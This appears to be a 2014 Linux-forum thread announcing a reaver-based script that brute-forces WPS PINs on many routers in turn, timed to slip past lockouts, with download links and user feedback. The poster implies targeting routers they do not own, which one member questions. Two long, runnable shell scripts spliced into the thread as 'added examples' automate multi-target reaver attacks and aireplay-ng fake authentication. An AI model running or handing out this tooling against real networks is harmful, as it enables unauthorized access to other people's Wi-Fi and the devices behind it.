A Reaver Based Multi-Target Pin Harvesting Program



mmusket33
2014-08-26, 10:03
Musket Teams have been watching the growing resistance to reaver WPS pin harvesting. Some routers lock after x number of pin requests, while others simply stop responding to pin requests for some period of time. In cases where the router locked the WPS system, these routers many times unlock within the next 18 to 24 hours. Very few in our areas of operation remain permanently locked. Those routers that stopped responding to pin requests but remained open were found to accept pin requests again in a few minutes. Hence WPS pins could be collected from these routers, but this would take a lot of effort.

The problem therefore was not technical but administrative. Musket Teams were in the process of automating these processes when we discovered auto-reaver. This program could collect pins from a large number of targets and looked very promising at first. But after testing the program for a month we found that auto-reaver would hang on targets under several different circumstances even though the author had attempted to prevent the problem through various bash methods. With auto-reaver off the map, we went back to writing a script with a new view of the problems and developed a very simple pin harvesting program primarily dependent on time.

The script file we call varmacreaverlocked18 was developed to slowly harvest pins from routers which either 1. lock their WPS systems after X number of pin requests or 2. stop responding to these pin requests but remain open. It employs the existing reaver program and should not be used if the router is open to WPS pin requests and is responding normally. The program requires a setup phase where the user enters the target APs and attack details of each target into a configuration txt file called maclistreaver. Once written, the user simply runs the varmacreaverlocked.sh program, answers a few simple questions and the program works its way through the target APs listed in the maclistreaver configuration file.

Varmacreaverlocked allows you to load up to 50 targets into the program through the maclistreaver configuration file. We will add more target slots if users so require.
A user can set the -r x:y command through the configuration file.
A long range weak RSSI feature has been added.
Special attack requirements for individual target APs could also be loaded into the reaver command lines manually if the user has some understanding of bash.

The reaver attack is time based. It cannot lock in an endless EAPOL hang on one target. When the program starts, it monitors the output of reaver. If a WPS locked state occurs or there is a failure to associate or reaver output is idle, the script shuts down reaver and moves on to the next target. If the attack is active the script will allow the process to continue until the time as set by the user expires. We are constantly refining the coding driving this section of the script.
Each target has its own individual time element. You can attack target1 for 120 seconds then go to target2 and attack it for 300 seconds as per the configuration file.

New
Enclosed is an updated version of varmacreaversav called

varmascreaver992.sh. We have added the ability to adjust the maclistreaver configuration file while the program is running.

The ability of the program to sense when reaver pin harvesting has stopped has been improved.


Older versions are withdrawn

An updated version of varmacreaversav called varmascreaver993.sh is available for download.

A bug in the automatic removal of log files has been corrected

Older versions have been withdrawn

varmacreaversav99-3.zip contains:

1. varmacreaversav99-3.sh
2. varmacreaversav993-help.txt
3. maclistreaversav


You can download this update at

http://www.axifile.com/en/91AF3E59AD

WPS Special Tools is available at

http://www.axifile.com/en/DCA5819C59

MTA
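The time-based loop the first post describes (a per-target time budget, bail out early on a WPS lock, a failed association, or a stalled reaver), written out as an added example. This is not the varmacreaver script and not its maclistreaver format: the target-file layout, the interface name, the log directory and the reaver message strings it matches (`Detected AP rate limiting`, `Failed to associate with`, `Trying pin`, `WPS PIN:`) are assumptions based on reaver 1.4-era output, so check them against your build with `reaver -vv`. It goes one step beyond a plain "no output" check: progress is counted only when reaver moves to a different pin, which also catches the case where reaver keeps re-trying one pin after EAPOL failures.

```shell
#!/bin/sh
# Added example, not the thread's varmacreaver script. Walks a target list,
# runs reaver against each BSSID for a fixed number of seconds, and moves on
# early when reaver reports an AP lock, cannot associate, or stops getting
# new pins tried. Target-file layout (an assumption):
#
#   # bssid             channel  seconds  extra reaver options
#   00:11:22:33:44:55   6        120      -r 3:15
#   66:77:88:99:AA:BB   11       300      -d 15
#
# Interface name, log directory and the reaver message strings matched below
# are assumptions; verify them against your build with `reaver -vv`.

IFACE=${IFACE:-mon0}
LOGDIR=${LOGDIR:-/tmp/pinharvest}
STALL_LIMIT=${STALL_LIMIT:-90}   # seconds without a new pin before giving up
POLL=${POLL:-2}                  # seconds between checks of the reaver log

# Read reaver output on stdin and print one verdict, most decisive first:
#   found   reaver printed the WPS PIN       locked  AP rate limiting seen
#   noassoc reaver could not associate       pin     still cycling pins
#   other   nothing decisive yet
classify_reaver_output() {
    buf=$(cat)
    if   printf '%s\n' "$buf" | grep -q 'WPS PIN:';                  then echo found
    elif printf '%s\n' "$buf" | grep -q 'Detected AP rate limiting'; then echo locked
    elif printf '%s\n' "$buf" | grep -q 'Failed to associate with';  then echo noassoc
    elif printf '%s\n' "$buf" | grep -q 'Trying pin';                then echo pin
    else echo other
    fi
}

# Print the last pin reaver said it was trying (accepts both `Trying pin 1234`
# and `Trying pin "1234"`), or nothing. Comparing pins rather than line counts
# catches a reaver that keeps re-trying the same pin after EAPOL failures.
latest_pin() {
    sed -n 's/.*Trying pin "\{0,1\}\([0-9][0-9]*\).*/\1/p' | tail -n 1
}

# run_target BSSID CHANNEL SECONDS [reaver options...]  -> prints stop reason
run_target() {
    bssid=$1; channel=$2; budget=$3; shift 3
    mkdir -p "$LOGDIR"
    log="$LOGDIR/$(printf '%s' "$bssid" | tr ':' '-').log"
    : > "$log"

    # Wrapper records reaver's pid and appends a sentinel when reaver exits,
    # so the poll loop can tell "reaver quit" from "reaver still running".
    (
        reaver -i "$IFACE" -b "$bssid" -c "$channel" -vv "$@" </dev/null &
        echo $! > "$log.pid"
        wait $!
        echo "__REAVER_EXIT__ $?"
    ) >"$log" 2>&1 &
    wrapper=$!

    start=$(date +%s); last_progress=$start; last_pin=''; reason=exited
    while ! grep -q '__REAVER_EXIT__' "$log"; do
        sleep "$POLL"
        now=$(date +%s)
        verdict=$(classify_reaver_output < "$log")
        case $verdict in
            found|locked|noassoc) reason=$verdict; break ;;
        esac
        pin=$(latest_pin < "$log")
        if [ -n "$pin" ] && [ "$pin" != "$last_pin" ]; then
            last_pin=$pin; last_progress=$now
        fi
        if [ $((now - start)) -ge "$budget" ];              then reason=timeout; break; fi
        if [ $((now - last_progress)) -ge "$STALL_LIMIT" ]; then reason=stalled; break; fi
    done

    # SIGINT makes reaver save its session, so the next pass resumes from it.
    kill -INT "$(cat "$log.pid" 2>/dev/null)" 2>/dev/null
    wait "$wrapper" 2>/dev/null
    echo "$reason"
}

# harvest TARGETFILE: one pass over the list, top to bottom.
harvest() {
    while read -r bssid channel secs extra; do
        case $bssid in ''|'#'*) continue ;; esac
        echo "[*] $bssid ch$channel, budget ${secs}s"
        # $extra is deliberately unquoted: it carries per-target reaver options
        reason=$(run_target "$bssid" "$channel" "$secs" $extra)
        echo "[*] $bssid stopped: $reason"
    done < "$1"
}

if [ $# -gt 0 ]; then harvest "$1"; fi
```

Usage: `sh harvest.sh targets.txt` as root with the card already in monitor mode; wrap the call in an outer `while :; do ...; sleep 3600; done` to get the slow, repeated passes the post describes, since each pass only spends its budget per AP and then moves on. A `stalled` stop reason is the EAPOL-hang case: reaver is still printing, but not trying new pins.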

mmusket33
2014-08-31, 09:20
Varmacreaverlocked18 has been updated to 19. See above for new download link

mmusket33
2014-09-04, 10:30
Musket Teams have updated the program to varmacreaversav.sh. We have added the ability to save text files written to screen and add known WPS pins to the command line.


Older versions are withdrawn. Upload varmacreaversav at:


http://www.axifile.com/en/83E5E4EACA

MTeams

Nick_the_Greek
2014-09-05, 06:29
Hi there!
Your script looks promising! I will try it for sure.

Just a quick question. What did you mean by that?

....In cases where the router locked the WPS system, these routers many times unlock within the next 18 to 24 hours. Very few in our areas of operation remain permanently locked. Those routers that stopped responding to pin request but remained open, were found to accept pin requests again in a few minutes....

Did you attack routers that you don't own?
Or those routers are in a testing environment that you own?

If this is the case then please refer to this:
https://forums.kali.org/showthread.php?8-Read-this-before-posting-%28Kali-Linux-forums-rules-and-guidelines%29


6. Ethical guidelines.
Any advice/information offered on these forums is to be used for the legal informational/professional/educational purposes for which it is intended.
We will not tolerate any questions pertaining to illegal activities. Any indication of illegal activities in your post will result in an immediate ban and deletion of your account from the forums.

It's well known that my English is terrible, and pardon me in advance if I understood wrong.

mmusket33
2014-09-13, 01:07
We have updated varmacreaversav to varmacreaversav992 available at

http://www.axifile.com/en/57D8CB36AF

Improvements include the ability to adjust the configuration file while the program is running.

Sensing that the reaver attack has stalled is also improved.


In closing we wish to quote Merlin and magic. To know their secret name is to own them. So if you know the WPS pin you own the router. Slowly cracking 11000 WPS pins is far better than trying to brute force a WPA handshake where the attack could stretch to decades.

mmusket33
2014-10-19, 08:58
An updated version of varmacreaversav called varmascreaversav99-3.sh is available for download.

A bug in the automatic removal of log files has been corrected.

Older versions have been withdrawn.


varmacreaversav99-3.zip contains:

1. varmacreaversav99-3.sh
2. varmacreaversav993-help.txt
3. maclistreaversav


You can download this update at

http://www.axifile.com/en/91AF3E59AD
MTB

Quest
2014-10-22, 01:23
Got it! Thank you. Will give it spin.

mmusket33
2014-10-26, 03:36
WPS Special Tools is available at:

http://www.axifile.com/en/DCA5819C59

Scolder
2014-10-27, 20:38
The updated script works great, at first. Because reaver is trying to associate itself to the AP, pin requests fail after the first loop. I tested this by using aireplay-ng to associate and reaver started moving along nicely. However, because everything gets restarted in the loop, including the wireless card, aireplay has to be restarted manually for your script to work.

If aireplay can be added so association can be passed through from reaver to aireplay, then your script would be fully automated.

mmusket33
2014-10-28, 11:17
We have run this script on three(3) different computers two(2) running kali 1-09 and one(1) running 1.07. The scripts ran unattended for two(2) days straight. We have been unable to duplicate this bug.

1. To be clear, which script are you referring to?
2. Post the aireplay-ng command line that you used. Aireplay has -0 thru -9. We can add the aireplay-ng routine that you used into the script and send it to you no problem. We simply cannot test it as we are not seeing this.

MTeams

Scolder
2014-10-29, 02:15
I am using the 006 version of your script.

The following aireplay command is currently being used:
aireplay-ng -1 60 -a bssid -e essid -q 10 mon0

Thanks

Scolder
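One way to do what Scolder describes, as an added example that is not the thread's script or its author's fix: start aireplay-ng fake authentication for the current target right before reaver, run reaver with `-A` (`--no-associate`) so it does not fight aireplay-ng for the association, and stop both when the per-target budget expires. Because the pair is started and torn down together, a loop that resets the card between targets can simply call `attack_with_fakeauth` again for the next AP. The `-1 60` and `-q 10` values follow the aireplay-ng line posted above; the interface name, the 3-second settle time and the `timeout` wrapper are assumptions. Both tools need root and a monitor-mode interface.

```shell
#!/bin/sh
# Added example, not the thread's script. Keeps aireplay-ng fake
# authentication running for the current target while reaver runs with
# -A (--no-associate), then stops both, so a per-target loop that resets
# the card between APs can just call attack_with_fakeauth again.
# Interface name and timings are assumptions; -1 60 / -q 10 follow the
# aireplay-ng line posted in the thread. Run as root on a monitor interface.

IFACE=${IFACE:-mon0}
DRY_RUN=${DRY_RUN:-0}   # 1: print the command lines instead of running them

fakeauth_cmd() {   # BSSID ESSID
    printf 'aireplay-ng -1 60 -a %s -e "%s" -q 10 %s' "$1" "$2" "$IFACE"
}

reaver_cmd() {     # BSSID CHANNEL [reaver options...]
    b=$1; c=$2; shift 2
    printf 'reaver -i %s -b %s -c %s -A -vv%s' "$IFACE" "$b" "$c" "${*:+ $*}"
}

# attack_with_fakeauth BSSID ESSID CHANNEL SECONDS [reaver options...]
attack_with_fakeauth() {
    bssid=$1; essid=$2; channel=$3; budget=$4; shift 4
    if [ "$DRY_RUN" = 1 ]; then
        fakeauth_cmd "$bssid" "$essid"; echo
        printf 'timeout -k 5 -s INT %s %s\n' "$budget" "$(reaver_cmd "$bssid" "$channel" "$@")"
        return 0
    fi
    # Fake auth first: -1 60 re-authenticates every 60 s and -q 10 sends
    # keep-alives every 10 s, so the association outlives reaver's retries.
    aireplay-ng -1 60 -a "$bssid" -e "$essid" -q 10 "$IFACE" </dev/null >/dev/null 2>&1 &
    fa=$!
    sleep 3
    # -A: reaver must not (re)associate itself. timeout(1) enforces the
    # per-target budget; SIGINT first lets reaver save its session, KILL
    # follows 5 s later if it does not exit.
    timeout -k 5 -s INT "$budget" reaver -i "$IFACE" -b "$bssid" -c "$channel" -A -vv "$@"
    rc=$?
    kill "$fa" 2>/dev/null; wait "$fa" 2>/dev/null
    return "$rc"
}

if [ $# -ge 4 ]; then attack_with_fakeauth "$@"; fi
```

Call it once per target from whatever loop drives the target list, after the interface has been brought back up; `DRY_RUN=1 sh fakeauth.sh 00:11:22:33:44:55 MyNet 6 120` prints the two command lines so they can be checked before running them for real.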